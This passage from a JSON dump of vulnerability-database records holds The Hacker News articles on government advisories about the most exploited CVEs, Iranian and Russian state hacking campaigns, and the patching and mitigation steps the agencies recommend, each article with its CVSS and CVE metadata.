Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. 
Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 
9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): 
[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T03:29:54", "description": "[Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>), [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), [ProxyLogon](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), [ZeroLogon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>), and flaws in [Zoho ManageEngine AD SelfService Plus](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), [Atlassian Confluence](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), and [VMware vSphere Client](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>) emerged as some of the top exploited security vulnerabilities in 2021.\n\nThat's according to a \"[Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>)\" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.\n\nOther frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server ([CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>)), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>)), and a path traversal defect in Fortinet FortiOS and FortiProxy 
([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjV_5FJTAhnIsR8JgqL9uQg0ZFxcNG_CjB_UQkbmLMHp3ywOvVYK21BPlGIrlFOkrpjXKZTudyfgIFVbvdoCqezanw_M902zAF_j0D0iiMlBFYA9xgTU3PqsuazBsluMEFz04W5fr6wR3IcoNmrMSzQaRgR5ai54nGTQjKTBNImgKDAlUP3blp4-t8a/s728-e100/cisa.jpg>)\n\nNine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.\n\n\"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities,\" the agencies said in a joint advisory.\n\n\"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors.\"\n\nTo mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-28T05:41:00", "type": "thn", "title": "U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688"], "modified": "2022-05-09T02:55:12", "id": "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "href": "https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:37", "description": "[](<https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and 
organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). 
\n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://thehackernews.com/images/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-controlled command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-forcing them by logging in with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, they moved to the final stage: executing the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. 
\n \n\n\n[](<https://thehackernews.com/images/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, critical systems should also be monitored continuously and kept up to date. 
Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-02-18T15:06:00", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "modified": "2020-02-18T15:13:08", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe>)\n\nAmid renewed tensions between the U.S. 
and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-forcing, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" is below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) 
(F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. 
\"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", 
"CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. 
sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agency noted.\n\nAmong some of the other tactics put to use by APT29 are password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying a Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual 
property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). Also in the mix is the practice of obtaining virtual private servers via false identities and cryptocurrencies, and relying on temporary VoIP telephone numbers and email accounts by making use of an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-27T09:14:00", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-28T06:42:30", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:20", "description": "[](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. 
